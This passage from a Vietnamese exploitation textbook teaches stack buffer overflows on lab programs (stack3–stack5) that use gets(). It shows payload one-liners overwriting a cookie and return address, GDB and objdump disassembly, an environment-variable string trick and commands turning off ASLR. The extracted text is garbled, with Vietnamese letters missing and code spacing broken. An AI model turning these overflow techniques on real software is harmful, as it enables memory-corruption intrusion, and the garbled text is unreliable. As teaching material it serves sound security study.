Thm ch chng ta cn c th s dng (v bn c c khuyn khch s
dng) cc ngn ng kch bn n gin ha cng vic ny. c gi c th s
dng bt k ngn ng kch bn no quen thuc vi mnh. Trong ti liu ny,
tc gi xin trnh by vi ngn ng Python
2
.
regular@exploitation:~/src$ python -c print "a"*16 + "\x05\x03\x02\x01" | ./st
ack2
You win!
Chng ta kt thc v d th hai ti y vi nhng im ng lu sau:
Cch truyn d liu vo chng trnh cng quan trng nh chnh bn thn
d liu .
S hiu bit v thi quen s dng mt ngn ng kch bn s tit kim
c nhiu thi gian v cng sc trong qu trnh tn dng li.
2
http://www.python.org
3.4. THAY I LUNG THC THI 43
2
3 i nt main ( )
4 {
5 i nt cooki e ;
6 char buf [ 1 6 ] ;
8 ge t s ( buf ) ;
9 i f ( cooki e == 0x00020300 )
10 {
11 pr i nt f ( "Youwin ! \ n" ) ;
12 }
13 }
Ngun 3.4: stack3.c
'
&
$
%
Dng c v suy ngh
Vi nhng g chng ta bn qua trong chng ny, c gi c th tn dng
c li ca Ngun 3.4 khng?
Tr li mu
3
c th c tm thy chn trang.
3.4 Thay i lung thc thi
3.4.1 K thut c
hai v d trc chng ta thay i gi tr mt bin ni b quan trng c nh
hng n kt qu thc thi ca chng trnh. Chng ta s p dng k thut
tip tc xem xt v d trong Ngun 3.5.
im khc bit duy nht gia v d ny v cc v d trc l gi tr cookie
c kim tra vi 000D0A00 do chng ta phng on rng vi mt cht sa
i ti cng dng lnh tn dng li s em li kt qu nh .
regular@exploitation:~/src$ python -c print "a"*16 + "\x00\x0A\x0D\x00" | ./st
ack4
ng tic, chng ta khng thy dng ch You win! c in ra mn hnh
na. Phi chng c s sai st trong cu lnh tn dng li? Hay cch tnh ton
ca chng ta b lch v cu trc b nh thay i?
3
python -c print "a"*16 + "\x00\x03\x02\x00" | ./stack3
44 CHNG 3. TRN B M
2
3 i nt main ( )
4 {
5 i nt cooki e ;
6 char buf [ 1 6 ] ;
8 ge t s ( buf ) ;
9 i f ( cooki e == 0x000D0A00)
10 {
11 pr i nt f ( "Youwin ! \ n" ) ;
12 }
13 }
Ngun 3.5: stack4.c
Dng c v suy ngh

c gi c th gii thch l do khng?
Kim tra kt qu thc hin lnh ta c th loi b kh nng u tin v cu
lnh c thc hin mt cch tt p nn m bo c php lnh ng.
Bi v Ngun 3.5 khng c s thay i cc bin ni b trong hm main nn
cu trc ngn xp ca main vn phi nh c minh ha trong Hnh 3.2.
Loi b hai trng hp ny dn ta n kt lun hp l cui cng l gi tr
cookie khng b i thnh 000D0A00. Nhng ti sao gi tr ca cookie b
thay i ng vi gi tr mong mun nhng v d trc?
Nguyn nhn cookie b thay i chnh l do bin buf b trn v ln qua phn
b nh ca cookie. V d liu c nhn t b nhp chun vo bin buf thng
qua hm gets nn chng ta s tm hiu hm gets k hn.
c ti liu v hm gets bng lnh man gets em li cho chng ta thng
tin sau:
gets() reads a line from stdin into the buffer pointed to by s until
either a terminating newline or EOF, which it replaces with \0.
Tm dch (vi nhng phn nhn mnh c t m): gets() c mt dng
t b nhp chun vo b m c tr n bi s cho n khi gp phi mt
k t dng mi hoc EOF, v cc k t ny c thay bng \0.
Nh ni n trong Tiu mc 2.1.3, k t dng mi c m ASCII l 0A.
Ghi gp k t ny, gets s ngng vic nhn d liu v thay k t ny bng k
t c m ASCII 0 (k t kt thc chui). Do , trng thi ngn xp ca hm
main i vi cu lnh tn dng s nh minh ha trong Hnh 3.4.
V vic nhp d liu b ngt ti k t dng mi nn hai k t c m ASCII
0D v 00 khng c a vo cookie. Hn na, bn thn k t dng mi cng
...
!"a ch# tr$ v%
ebp c&
00 00 XX XX
61 61 61 61
61 61 61 61
61 61 61 61
61 61 61 61
...
ng'ng nh(p t)i 0A
v !*i thnh 00
Hnh 3.4: Chui nhp b ngt ti 0A
b i thnh k t kt thc chui. Do gi tr ca cookie s khng th c
gn bng vi gi tr mong mun, v chng ta cn mt cch thc tn dng li
khc.
3.4.2 Lung thc thi (control flow)
Hy xem li qu trnh thc hin chng trnh Ngun 3.5. Trc ht, h iu
hnh s np chng trnh vo b nh, v gi hm main. Vic u tin hm main
lm l gi ti printf in ra mn hinh mt chui thng tin, sau main gi ti
gets nhn d liu t b nhp chun. Khi gets kt thc, main s kim tra gi
tr ca cookie vi mt gi tr xc nh. Nu hai gi tr ny nh nhau th chui
You win! s c in ra mn hnh. Cui cng, main kt thc v quay tr v b
np (loader) ca h iu hnh. Qu trnh ny c m t trong Hnh 3.5.
cc v d trc, chng ta chuyn hng lung thc thi ti hnh thoi
chng trnh i theo mi tn bng v gi hm printf in ra mn hnh. Vi v
d ti Ngun 3.5, chng ta khng cn kh nng chn nhnh so snh na.
Tuy nhin chng ta vn c th s dng m nhnh bng y nu nh chng
ta c th a con tr lnh v v tr ca nhnh.
Dng c v suy ngh

Bn c c ngh g khng?
V khng th r vo nhnh bng nn chng trnh ca chng ta s lun i
theo nhnh khng, v s i ti phn kt thc ca hm main. Nh li Tiu
mc 2.3.3, phn kt thc ca mt hm gn con tr lnh vi gi tr lu trn
46 CHNG 3. TRN B M
main
b! n"p
d#n
nh$p
printf
gets
cookie=
000D0A00
printf
b!ng
k%t
thc
khng
Hnh 3.5: Biu lung thc thi
d!n
nh"p
printf
gets
cookie=
000D0A00
b!ng
k#t
thc
khng
printf
Hnh 3.6: Tr v chnh thn hm
ngn xp tr v hm gi n. Thng thng, phn kt thc ca main s quay
tr v b np ca h iu hnh nh c minh ha. Trong trng hp c bit
khc, phn kt thc c th quay v mt a im bt k. V s tht tuyt vi
nu a im ny l nhnh bng nh trong Hnh 3.6.
Yu t quyt nh a im m phn kt thc quay li chnh l a ch tr
v c lu trn ngn xp. Trong Hnh 3.2, a ch ny nm pha sau buf v do
c th b ghi hon ton nu nh d liu nhp c di t 1C (28 thp
phn) k t tr ln.
Nh vy, ta xc nh c hng i mi trong vic tn dng li ca
Ngun 3.5. Vn cn li l tm ra a ch ca nhnh bng.
3.4.3 Tm a ch nhnh bng
C nhiu cch tm a ch nhnh bng trong chng trnh. Cc chuyn gia an
ninh ng dng thng s dng chng trnh dch ngc tng tc Interactive
48 CHNG 3. TRN B M
DisAssembler (IDA) x l mi vic. Chng trnh IDA c cung cp v
hng dn s dng trong kha hc trc tip ca tc gi nhng gim s lng
cy b cht cho vic in nhiu hnh nh nn chng ta s xem xt nhng cch
khc. S dng trnh g ri GDB, hoc cng c objdump l hai cch chng ta s
bn ti y.
3.4.3.1 Vi GDB
G ri (debug) l cng vic nghin cu hot ng ca chng trnh nhm tm
ra nguyn nhn ti sao chng trnh hot ng nh th ny, hay nh th kia.
Chng trnh g ri (debugger) ph thng trong Linux l GDB. s dng
GDB, ta dng lnh vi c php gdb <cmd>. V d g ri stack4, ta dng lnh
nh hnh chp sau.
regular@exploitation:~/src$ gdb ./stack4
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/
lib/tls/i686/cmov/libthread_db.so.1".
gdb$
GDB hin ra du nhc gdb$ ch lnh. Nu ta nhp vo x/22i main th GDB
s hin (x) trn mn hnh 22 (thp phn) lnh hp ng (i) u tin ca hm
main.
gdb$ x/22i main
0x8048470 <main>: push ebp
0x8048471 <main+1>: mov ebp,esp
0x8048473 <main+3>: sub esp,0x28
0x8048476 <main+6>: add esp,0xfffffffc
0x8048479 <main+9>: lea eax,[ebp-4]
0x804847c <main+12>: push eax
0x804847d <main+13>: lea eax,[ebp-20]
0x8048480 <main+16>: push eax
0x8048481 <main+17>: push 0x80485d0
0x8048486 <main+22>: call 0x804834c <printf@plt>
0x804848b <main+27>: add esp,0x10
0x804848e <main+30>: add esp,0xfffffff4
0x8048491 <main+33>: lea eax,[ebp-20]
0x8048495 <main+37>: call 0x804831c <gets@plt>
0x804849a <main+42>: add esp,0x10
0x804849d <main+45>: cmp DWORD PTR [ebp-4],0xd0a00
0x80484a4 <main+52>: jne 0x80484b6 <main+70>
0x80484a6 <main+54>: add esp,0xfffffff4
0x80484a9 <main+57>: push 0x80485e7
0x80484ae <main+62>: call 0x804834c <printf@plt>
0x80484b3 <main+67>: add esp,0x10
gdb$
Ct u tin l a ch m dng lnh ny s c ti vo b nh khi thc
thi. Ct th hai l khong cch tng i so vi dng lnh u tin ca main.
Ct ch ba chnh l cc lnh hp ng.
Da theo biu lung iu khin, ta s cn tm ti nhnh c cha li gi
hm printf th hai. Ti a ch 080484AE l li gi hm printf th hai do
nhnh bng chnh l nhnh c cha a ch ny. Mt vi dng lnh pha trn
li gi hm l mt lnh nhy c iu kin JNE, nh du s r nhnh. ch
n ca lnh nhy ny l mt nhnh, v phn pha sau lnh nhy l mt nhnh
khc. V phn pha sau lnh nhy c cha li gi hm ta ang xt nn nhnh
bng bt u t a ch 080484A6.
thot GDB, chng ta nhp lnh quit.
3.4.3.2 Vi objdump
Chng trnh objdump cung cp thng tin v mt tp tin thc thi theo nh
dng ELF (c s dng trong cc h iu hnh Linux, BSD, Solaris).
Objdump c th c s dng in ra cc lnh hp ng nh GDB nu c
gi vi tham s -d.
regular@exploitation:~/src$ objdump -d ./stack4
./stack4: file format elf32-i386
Disassembly of section .init:
080482e4 <_init>:
80482e4: 55 push %ebp
80482e5: 89 e5 mov %esp,%ebp
80482e7: 83 ec 08 sub $0x8,%esp
80482ea: e8 a5 00 00 00 call 8048394 <call_gmon_start>
80482ef: e8 3c 01 00 00 call 8048430 <frame_dummy>
80482f4: e8 77 02 00 00 call 8048570 <__do_global_ctors_aux>
80482f9: c9 leave
80482fa: c3 ret
Bn dch ngc m objdump cung cp l ca ton b tp tin thc thi, thay
v ca mt hm nh ta lm vi GDB. Tm kim trong thng tin objdump
xut ra, chng ta c th thy c mt on nh hnh chp sau.
50 CHNG 3. TRN B M
08048470 <main>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 28 sub $0x28,%esp
8048476: 83 c4 fc add $0xfffffffc,%esp
8048479: 8d 45 fc lea 0xfffffffc(%ebp),%eax
804847c: 50 push %eax
804847d: 8d 45 ec lea 0xffffffec(%ebp),%eax
8048480: 50 push %eax
8048481: 68 d0 85 04 08 push $0x80485d0
8048486: e8 c1 fe ff ff call 804834c <printf@plt>
804848b: 83 c4 10 add $0x10,%esp
804848e: 83 c4 f4 add $0xfffffff4,%esp
8048491: 8d 45 ec lea 0xffffffec(%ebp),%eax
8048494: 50 push %eax
8048495: e8 82 fe ff ff call 804831c <gets@plt>
804849a: 83 c4 10 add $0x10,%esp
804849d: 81 7d fc 00 0a 0d 00 cmpl $0xd0a00,0xfffffffc(%ebp)
80484a4: 75 10 jne 80484b6 <main+0x46>
80484a6: 83 c4 f4 add $0xfffffff4,%esp
80484a9: 68 e7 85 04 08 push $0x80485e7
80484ae: e8 99 fe ff ff call 804834c <printf@plt>
80484b3: 83 c4 10 add $0x10,%esp
Ct u tin l a ch lnh tng t nh bn xut ca GDB. Ct th hai l
m my tng ng vi cc lnh hp ng ct th ba. im khc bit ln nht
gia bn xut ca objdump v GDB l objdump s dng c php kiu AT&T.
Vi c php AT&T th tham s ngun s i trc tham s ch.
Cng p dng l lun nh vi GDB, ta cng tm c a ch ca nhnh
bng bt u t 080484A6.
3.4.4 Quay v chnh thn hm
Gi y, chng ta xc nh c a ch m chng ta mun phn kt thc
quay tr v. a ch ny phi c t vo ng ngn xp nh minh hot
trong Hnh 3.7.
t c trng thi ny, chui nhp vo phi di lp y bin buf
(cn 10 byte), trn qua bin cookie (cn 4 byte), vt c ngn xp cha gi
tr EBP c (cn 4 byte), v bn k t cui cng phi c m ASCII ln lt l
A6, 84, 04, v 08. May mn cho chng ta l trong bn k t ny, khng c k
t dng mi. Nh vy ta s cn 18 k t lp ch trng v 4 k t cui nh
nh.
regular@exploitation:~/src$ python -c print "a"*0x18 + "\xA6\x84\x04\x08" | ./
stack4
You win!
Segmentation fault
Chng ta cng c th dng a ch 080484A9 thay cho 080484A6 v n khng
thay i kt qu ca lnh gi hm printf. Tuy nhin chng ta khng th tr
v ngay lnh gi hm printf ti a ch 080484AE v tham s truyn vo hm
printf cha c thit lp. Tham s ny c thit lp qua lnh PUSH trc
n, ti a ch 080484A9.
3.5. QUAY V TH VIN CHUN 51
...
A6 84 04 08
ebp c!
cookie
buf
buf
buf
buf
...
Hnh 3.7: Trng thi cn t c
regular@exploitation:~/src$ python -c print "a"*0x18 + "\xA9\x84\x04\x08" | ./
stack4
You win!
Segmentation fault
Phng php tn dng li chng ta va xem xt qua c gi l k thut
quay v phn vng .text (return to .text). Mt tp tin thc thi theo nh dng
ELF c nhiu phn vng. Phn vng .text l phn vng cha tt c cc m
lnh c trnh bin dch to ra, v s c b vi x l thc thi. K thut
ny kh quan trng v i khi m lnh m chng ta cn thc thi c sn trong
chng trnh nn chng ta ch cn tm ra a ch cc m lnh l c th
thc hin thnh cng vic tn dng li nh trong v d bn n y.
Cng thng qua v d ny, c gi c th nhn ra mt vi im ng lu
sau:
1. Chng ta phi hiu tht k cch hot ng ca chng trnh, v c nhng
th vin c s dng. Nu nh khng bit r v hm gets th ta s khng
nhn ra c k t dng mi b chuyn thnh k t kt thc chui v l
nguyn nhn lm cho vic tn dng theo cch c khng thnh cng.
2. Nu chng trnh c nhng cch thc phng chng, hay hn ch vic
tn dng li th chng ta tt nht nn tm mt phng thc tn dng
khc thay v c gng lm cho phng thc c hot ng c.
3. C nhiu cch tn dng mt li. Nh trong v d ny, chng ta c th
s dng hai a ch trong nhnh bng quay tr v.
52 CHNG 3. TRN B M
2
3 i nt main ( )
4 {
5 i nt cooki e ;
6 char buf [ 1 6 ] ;
8 ge t s ( buf ) ;
9 i f ( cooki e == 0x000D0A00)
10 {
11 pr i nt f ( "You l o s e ! \ n" ) ;
12 }
13 }
Ngun 3.6: stack5.c
3.5 Quay v th vin chun
cc v d trc, chng ta tn dng m lnh c sn trong chng trnh
in dng ch You win!. Trong Ngun 3.6, chng ta khng thy on m thc
hin tc v mong mun y na. Thay v in You win!, Ngun 3.6 in You
lose!. Mc d vy, mc tiu ca chng ta vn khng thay i.
3.5.1 Chn d liu vo vng nh ca chng trnh
Vi nhn xt , vic u tin chng ta cn lm l phi a c chui You
win! vo trong vng nh ca chng trnh v xc nh c a ch ca vng
nh .
Dng c v suy ngh

c gi c th ngh ra bao nhiu cch?
Mi tin trnh (process) trong h iu hnh Linux c cp mt vng nh
hon ton tch bit vi cc tin trnh khc mc d chng c th c cng mt
a ch tuyn tnh. a ch tuyn tnh ny c phn qun l b nh o nh x
sang a ch b nh vt l nh bn n trong Tiu mc 2.2.3.1.
Tuy tch bit nhng mt vi d liu ca tin trnh m s c chp vo
vng nh ca tin trnh con khi tin trnh con c h iu hnh np vo b
nh. Cc d liu bao gm:
1. Cc bin mi trng.
2. Tn tp tin thc thi.
3. Tham s dng lnh.
2
3 i nt main ( )
4 {
5 pr i nt f ( "%08x\n" , getenv ( "EGG" ) ) ;
6 return 0;
7 }
Ngun 3.7: getenv.c
3.5.1.1 Bin mi trng
Bin mi trng (environment variable) c t vo cui phn nh dng cho
ngn xp. Cc bin mi trng c k tha t tin trnh m xung tin trnh
con. Tuy th t (v do , v tr) cc bin mi trng c th b thay i khi c
s thay i v s lng, v ni dung cc bin mi trng, nhng thng thng
tin trnh con s nhn y cc bin mi trng ca tin trnh m.
V d chng ta hay dng cc dng lnh sau thit lp bin mi trng
JAVA_HOME.
JAVA_HOME=/opt/jdk1.6.0
export JAVA_HOME
Sau khi thc hin, bin mi trng JAVA_HOME s c gn gi tr
/opt/jdk1.6.0 v c k tha xung cc tin trnh con. Chnh v l do
nn cc tin trnh Java sau ny u bit th mc Java gc u.
iu ny c ngha rng nu ta thc hin lnh thit lp mt bin mi trng
vi gi tr You win! th ta s truyn c chui ny vo vng nh ca cc tin
trnh sau .
EGG=You win!
export EGG
tm a ch ca chui ny trong b nh, chng ta c th s dng chng
trnh nh c lit k trong Ngun 3.7. Khi chy, chng trnh s in a ch ca
chui You win!.
regular@exploitation:~/src$ gcc -o getenv getenv.c
regular@exploitation:~/src$ ./getenv
bffffc36
V v tr cc bin mi trng rt nhy cm vi gi tr ca chng nn m
bo rng mi tin trnh u cha chui You win! ti a ch BFFFFC36, chng
ta phi m bo khng c s thay i g ti bin mi trng trong cc ln thc
thi chng trnh. Mt trong nhng thay i v tnh m chng ta t lu ti l
s thay i th mc hin ti. Hy ch s thay i a ch ca cng bin mi
trng trong hnh chp sau.
54 CHNG 3. TRN B M
regular@exploitation:~/src$ cp getenv ..
regular@exploitation:~/src$ cd ..
regular@exploitation:~$ ./getenv
bffffc3a
regular@exploitation:~$
Khng nhng vy, di dng lnh cng c nh hng ti v tr ca cc
bin mi trng.
bffffc36
regular@exploitation:~/src$ ././getenv
bffffc32
regular@exploitation:~/src$ ./././getenv
bffffc2e
regular@exploitation:~/src$ cp getenv ge
regular@exploitation:~/src$ ./ge
bffffc3e
Quan st s thay i gi tr chng ta c th thy quy lut n gin v tr
gi tr ca bin mi trng b gim i 2 n v khi dng lnh tng thm 1 k
t. T ./getenv tng thm 2 k t thnh ././getenv lm v tr gim i 4 n
v xung BFFFC32. T ./getenv gim i 4 k t thnh ./ge lm v tr tng
thm 8 n v ln BFFFFC3E.
i li v ASLR
Xin c gi lu rng mi trng lm vic ca chng ta khng c chc nng
ngu nhin ha dn tri khng gian cp cao (Advanced Space Layout Random-
ization hay ASLR) nn cc a ch chng ta tm c s khng thay i qua cc
ln thc thi chng trnh.
regular@exploitation:~/src$ cat /proc/sys/kernel/randomize_va_space
0
Khi chc nng ny c bt, h iu hnh s di chuyn cc khi b nh n
nhng ni khc nhau mi khi chng trnh c thc thi. Do , a ch s b
thay i qua cc ln thc thi.
regular@exploitation:~/src$ sudo sh -c echo 1 > /proc/sys/kernel/randomize_va_s
pace
regular@exploitation:~/src$ cat /proc/sys/kernel/randomize_va_space
1
bf987c36
bfcc6c36
regular@exploitation:~/src$ sudo sh -c echo 0 > /proc/sys/kernel/randomize_va_s
pace
3.5.1.2 Tn tp tin thc thi
Tn tp tin thc thi c t vo ngn xp nh cc bin mi trng. Chng ta
c th li dng iu ny a mt chui vo cng nh ca chng trnh bng
cch i tn chng trnh thnh chui mong mun thng qua lnh mv.
mv stack5 You win!
3.5.1.3 Tham s dng lnh
Cng nh tn tp tin, tham s dng lnh cng c truyn vo chng trnh
qua ngn xp. Cho nn chng ta c th gi chng trnh vi tham s You win!
nh sau.
./stack5 You win!
Vic xc nh a ch chui tham s v tn chng trnh (c hai u l nhng
phn t ca mng argv trong chng trnh C) s l mt cu nh dnh cho
c gi.
3.5.1.4 Chnh bin buf
Chng trnh nhn d liu nhp v ta hon ton c th nhp vo chui You
win! vo chng trnh! Chui nhp vo s c lu trong bin buf. Tuyt vi
hn c l v d ny, a ch bin buf c thng bo ra mn hnh cho chng
ta bit.
regular@exploitation:~/src$ ./stack5
You win!
Trong hnh chp trn, bin buf nm ti a ch BFFFFA34.
3.5.2 Quay v lnh gi hm printf
Khi c chui cn in trong b nh, v a ch ca n, chng ta ch cn truyn
a ch ny lm tham s cho hm printf th s t c mc tiu. Hy xem xt
cc lnh hp ng dng in chui You lose!.
56 CHNG 3. TRN B M
gdb$ disassemble main
Dump of assembler code for function main:
0x08048470 <main+0>: push ebp
0x08048471 <main+1>: mov ebp,esp
0x08048473 <main+3>: sub esp,0x28
0x08048479 <main+9>: lea eax,[ebp-4]
0x08048481 <main+17>: push 0x80485d0
0x0804848b <main+27>: add esp,0x10
0x0804848e <main+30>: add esp,0xfffffff4
0x08048491 <main+33>: lea eax,[ebp-20]
0x08048495 <main+37>: call 0x804831c <gets@plt>
0x0804849a <main+42>: add esp,0x10
0x0804849d <main+45>: cmp DWORD PTR [ebp-4],0xd0a00
0x080484a4 <main+52>: jne 0x80484b6 <main+70>
0x080484a6 <main+54>: add esp,0xfffffff4
0x080484a9 <main+57>: push 0x80485e7
0x080484ae <main+62>: call 0x804834c <printf@plt>
0x080484b3 <main+67>: add esp,0x10
0x080484b6 <main+70>: mov esp,ebp
0x080484b8 <main+72>: pop ebp
0x080484b9 <main+73>: ret
0x080484ba <main+74>: nop
0x080484bb <main+75>: nop
0x080484bc <main+76>: nop
0x080484bd <main+77>: nop
0x080484be <main+78>: nop
0x080484bf <main+79>: nop
End of assembler dump.
gdb$
Trc khi thc hin lnh CALL, ti a ch 080484A9, lnh PUSH a a
ch ca chui You lose! vo ngn xp. Chng ta c th kim tra chnh xc
chui g c t ti 080485E7 thng qua lnh x/s.
gdb$ x/s 0x80485e7
0x80485e7 <_IO_stdin_used+27>: "You lose!\n"
gdb$
Nh vy, trc khi n lnh CALL ti 080484AE, nh ngn xp s phi
cha a ch chui cn in. Nhn xt ny em li cho chng ta tng quay
tr v thng a ch 080484AE nu nh ta c th gn a ch chui You win!
vo nh ngn xp. Vi phng php ny, trng thi ngn xp cn t c s
tng t nh Hnh 3.7, ch khc l a ch tr v s c gi tr 080484AE.
1 main ( )
2 {
3 pr i nt f ( "Youwin ! " ) ;
4 ( i nt ) ( 0) = 0;
5 }
Ngun 3.8: scratch.c
Vic cn li chng ta cn lm l tm v tr nh ngn xp sau khi hm main
quay v a ch 080484AE. main quay v CALL printf th trc khi lnh
RET phn kt thc ca hm main c thc hin, con tr ngn xp phi ch
ti ngn xp cha a ch tr v . Sau khi thc hin lnh RET, con tr ngn
xp s dch ln mt ngn xp nh m t trong Hnh 3.8, v con tr lnh s
ch ti v tr mong mun.
Chng ta xc nh c nh ngn xp nn chng ta s t ti v tr
a ch chui You win!. n gin ha vn tm a ch, chng ta s truyn
chui You win! vo chng trnh thng qua vic nhp vo bin buf. Do a
ch chui s l BFFFFA34 nh bn trn v trng thi ngn xp cn t
c m t nh Hnh 3.9.
Tm li, chng ta s cn mt chui bt u vi You win!, theo sau bi k t
kt thc chui, ri ti 7 k t bt k lp y buf, sau 4 k t lp cookie,
4 k t khc lp gi tr EBP c, a ch ca dng lnh CALL printf, v kt
thc vi a ch ca bin buf. Hay ni cch khc, ta s cn 1 + 7 + 4 + 4 = 10
k t kt thc chui (m ASCII 00) lp ch trng.
regular@exploitation:~/src$ python -c print "You win!" + "\x00"*0x10 + "\xAE\x8
4\x04\x08\x34\xFA\xFF\xBF" | ./stack5
Segmentation fault
Chng ta khng nhn c chui You win! trn mn hnh!
'
&
$
%
Dng c v suy ngh
Mc d vi cc tnh ton hp l, chui tn dng ca chng ta c v nh khng
c tc dng. Bn c c th gii thch l do khng?
3.5.3 i tm chui b nh cp
Trc khi tm hiu vn vi vic tn dng li, chng ta hy kho st qua mt
on m ngn nh trong Ngun 3.8.
Nu bin dch v thc thi on m , chng ta s ch nhn c thng bo
li.
58 CHNG 3. TRN B M
...
XX XX XX XX
AE 84 04 08
ebp c!
cookie
buf
buf
buf
buf
...
ESP
(a) ESP ch n ngn xp cha a ch tr v
...
XX XX XX XX
AE 84 04 08
ebp c!
cookie
buf
buf
buf
buf
...
ESP
(b) Con tr ngn xp dch ln 1
Hnh 3.8: Trng thi ngn xp trc v sau RET
...
34 FA FF BF
AE 84 04 08
ebp c!
cookie
buf
00 XX XX XX
77 69 6E 21
59 6F 75 20
...
BFFFFA34
Hnh 3.9: Trng thi ngn xp cn t c
regular@exploitation:~/src$ ./scratch
Segmentation fault
Dng ch You win! cng lng l bin mt y nh vn chng ta gp phi.
Phi chng hm printf b b qua?
kim tra xem hm printf c c gi vi tham s chnh xc hay khng,
chng ta c th dng cng c ltrace. Cng c ltrace theo di mi li gi th vin
ng trong qu trnh thc thi ca mt ng dng.
regular@exploitation:~/src$ ltrace ./scratch
__libc_start_main(0x8048440, 1, 0xbffffab4, 0x80484c0, 0x8048470 <unfinished ...>
__register_frame_info(0x804958c, 0x804969c, 0xbffffa08, 0x8048370, 0xb7fdaff4) = 0
printf("You win!") = 8
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
Kt qu ca vic theo di qu trnh hot ng cho thy hm printf tht ra
c gi vi tham s ng v hot ng mt cch ng n.
Vy th l do ch c th l trong chnh bn thn hm printf. V tht s l
vy. Hm printf cha chui cn in vo mt b m. Ch khi no gp phi k
hiu xung dng, hoc b m ny ln (vo c vi kilobyte), hoc chng
trnh kt thc bnh thng khng xy ra li th hm printf mi chuyn chng
ra mn hnh.
kim chng, chng ta c th lp li th nghim vi mt t thay i trong
m ngun. Chng ta thm k t xung dng vo cui chui You win! nh
trong Ngun 3.9. V chui cn in c in.
60 CHNG 3. TRN B M
1 main ( )
2 {
3 pr i nt f ( "Youwin ! \ n" ) ;
4 ( i nt ) ( 0) = 0;
5 }
Ngun 3.9: scratch.c c sa
regular@exploitation:~/src$ ./scratch
You win!
Segmentation fault
3.5.4 Quay tr li v d
Quay tr li v d chng ta ang xem xt, chng ta s dng ltrace kim
chng liu hm printf c c gi vi tham s mong mun khng.
Trc tin, chng ta phi tm a ch ca bin buf khi chy chng trnh b
li trong ltrace.
regular@exploitation:~/src$ ltrace ./stack5
__libc_start_main(0x8048470, 1, 0xbffffab4, 0x8048510, 0x80484c0 <unfinished ...
>
__register_frame_info(0x80495f4, 0x8049708, 0xbffffa08, 0x80483a0, 0xb7fdaff4) =
0
printf("&buf: %p, &cookie: %p\n", 0xbffffa24, 0xbffffa34&buf: 0xbffffa24, &cooki
e: 0xbffffa34
) = 38
gets(0xbffffa24, 0xbffffa24, 0xbffffa34, 0x80482f9, 1
) = 0xbffffa24
__deregister_frame_info(0x80495f4, 0xb7fdb300, 0, 0xb8000cc0, 0xbffffa38) = 0
+++ exited (status 36) +++
a ch bin buf c in ra l BFFFFA24. Do , chui nhp vo ca chng
ta c cht thay i. V thay v dng ng truyn thng vo chng trnh,
chng ta s chuyn chui ny vo mt tp tin s dng vi ltrace.
regular@exploitation:~/src$ python -c print "You win!" + "\x00"*0x10 + "\xAE\x8
4\x04\x08\x24\xFA\xFF\xBF" > exp
regular@exploitation:~/src$ ltrace ./stack5 < exp
__libc_start_main(0x8048470, 1, 0xbffffab4, 0x8048510, 0x80484c0 <unfinished ...
>
__register_frame_info(0x80495f4, 0x8049708, 0xbffffa08, 0x80483a0, 0xb7fdaff4) =
0
printf("&buf: %p, &cookie: %p\n", 0xbffffa24, 0xbffffa34&buf: 0xbffffa24, &cooki
e: 0xbffffa34
) = 38
gets(0xbffffa24, 0xbffffa24, 0xbffffa34, 0x80482f9, 1) = 0xbffffa24
printf("You win!") = 20
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
ng nh tnh ton, chui You win! tht s c truyn vo hm printf
nh mong i. Nhng v chng ta khng c k t dng mi cui nn chui
ny khng c in ra mn hnh. Chng ta phi ngh ti cch khc.
'
&
$
%
Dng c v suy ngh
Gi s nh chng ta c k t dng mi cui chui, chng ta cng s khng
nhn c chui mong mun nu chui c t u bin buf nh hin
ti. c gi c bit ti sao khng?
4
3.5.5 Gi chng trnh ngoi
3.5.5.1 Vi trng hp tn chng trnh l a
Cng nhn tham s l a ch ca mt chui tng t nh printf cn c hm
strlen, atoi, v mt s hm khc. V printf khng th gip chng ta t c
mc tiu nn chng ta cn phi xem xt ti vic s dng cc hm ny. Mt
trong nhng hm chng ta quan tm l system. Hm system thc thi mt lnh
trong v (shell). V d nu gi system(ls) th cng nh chng ta nhp vo
lnh ls trong v sh.
Gi y, chng ta tm ra thm mt con ng t n mc tiu nh
minh ha trong Hnh 3.10. Trc ht chng ta s to ra mt chng trnh v
n gin in chui You win!, v sau tm cch chng trnh ny c thc
thi thng qua hm system.
Hy t tn cho chng trnh v ny l a v t quyn thc thi cho n. ng
thi, ta cng phi m bo rng chng trnh v ny hot ng theo ng
mun.
1 #! / bi n/sh
2 echo You win !
Ngun 3.10: a
regular@exploitation:~/src$ chmod u+x a
regular@exploitation:~/src$ ./a
You win!
Nh cc v d trc khi quay v CALL printf, chng ta s cn tm a ch
ca mt lnh gi hm system trong chng trnh. Tht khng may l chng
trnh ca chng ta khng c bt k li gi hm no ti system.
Tuy nhin, chng ta nh rng lnh CALL thc cht s lm hai tc v l a
a ch tr v vo ngn xp, v nhy ti a ch ca i s. Tc v u tin lm
cho nh ngn xp ch ti a ch tr v. Tc v th hai lm thay i con tr
4
L do s c gii thch Tiu mc 3.5.5.2.
62 CHNG 3. TRN B M
main system
d!n
nh"p
printf
gets
cookie=
000D0A00
printf
yes
k#t
thc
no
d!n
nh"p
thn
k#t
thc
Hnh 3.10: Quay v hm system
lnh v chnh l mu cht ca lnh CALL. thay th c lnh CALL, ta
phi tm c a ch ca i s ca lnh CALL, tc a ch hm system.
Cng nh printf, hm system l mt hm trong b th vin chun cho nn
mc d chng trnh khng trc tip s dng hm system, nhng hm ny cng
c ti vo b nh khi b th vin c ti vo. tm a ch ca system,
chng ta s s dng n GDB.
gdb$ break main
Breakpoint 1 at 0x8048476
gdb$ run
Failed to read a valid object file image from memory.
--------------------------------------------------------------------------[regs]
EAX: BFFFFAA4 EBX: B7FDAFF4 ECX: B7EC2E6D EDX: 00000001 o d I t S z a P c
ESI: 00000000 EDI: B8000CC0 EBP: BFFFFA28 ESP: BFFFFA00 EIP: 08048476
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
[007B:BFFFFA00]----------------------------------------------------------[stack]
BFFFFA50 : 30 FA FF BF 6D 2E EC B7 - 00 00 00 00 00 00 00 00 0...m...........
BFFFFA40 : F4 AF FD B7 00 00 00 00 - C0 0C 00 B8 78 FA FF BF ............x...
